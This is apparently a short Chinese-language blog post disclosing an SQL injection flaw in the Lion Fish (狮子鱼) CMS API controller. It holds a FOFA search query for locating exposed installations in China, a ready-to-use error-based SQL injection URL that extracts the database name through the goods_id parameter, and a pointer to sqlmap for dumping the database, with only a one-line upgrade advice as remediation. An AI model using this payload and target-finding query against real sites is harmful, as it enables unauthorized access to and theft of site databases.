狮子鱼cms"/>
狮子鱼cms
1.简介
工作发现,狮子鱼cms存在sql注入漏洞,该漏洞是由于狮子鱼CMS ApiController.class.php 参数过滤存在不严谨,可能导致SQL注入漏洞。
2.FOFA语法
"/seller.php?s=/Public/login" && country="CN"
3.poc
index.php?s=api/goods_detail&goods_id=1%20and%20updatexml(1,concat(0x7e,database(),0x7e),1)
使用sqlmap爆破数据库
4.修复建议
升级至最新版本
更多推荐
狮子鱼cms
发布评论